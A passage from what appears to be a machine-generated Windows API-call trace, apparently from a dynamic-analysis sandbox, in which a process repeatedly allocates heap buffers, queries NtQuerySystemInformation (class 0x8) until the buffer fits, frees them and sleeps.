SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0294.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0294.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0294.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0294.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.695] Sleep (dwMilliseconds=0x110) [0294.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0294.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0294.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0294.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0294.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0294.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0294.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0294.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0294.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.705] Sleep (dwMilliseconds=0x110) [0294.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0294.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0294.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0294.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0294.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0294.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0294.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.741] Sleep (dwMilliseconds=0x110) [0294.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0294.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0294.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0294.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0294.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0294.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0294.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0294.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0294.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.753] Sleep (dwMilliseconds=0x110) [0294.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0294.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0294.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0294.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0294.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0294.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0294.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0294.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0294.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.771] Sleep (dwMilliseconds=0x110) [0294.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0294.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0294.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0294.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0294.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0294.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0294.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.784] Sleep (dwMilliseconds=0x110) [0294.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0294.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0294.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0294.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0294.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.801] Sleep (dwMilliseconds=0x110) [0294.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0294.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0294.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0294.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0294.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0294.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0294.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0294.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0294.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.816] Sleep (dwMilliseconds=0x110) [0294.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0294.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0294.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0294.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0294.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0294.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0294.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.832] Sleep (dwMilliseconds=0x110) [0294.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0294.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0294.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0294.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0294.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0294.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0294.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.847] Sleep (dwMilliseconds=0x110) [0294.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0294.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0294.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0294.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0294.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0294.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0294.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0294.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0294.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.863] Sleep (dwMilliseconds=0x110) [0294.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0294.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0294.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0294.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0294.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0294.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0294.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.879] Sleep (dwMilliseconds=0x110) [0294.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0294.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0294.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0294.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0294.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0294.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0294.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0294.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0294.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.894] Sleep (dwMilliseconds=0x110) [0294.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0294.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0294.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0294.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0294.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0294.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0294.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0294.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0294.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.912] Sleep (dwMilliseconds=0x110) [0294.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0294.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0294.923] 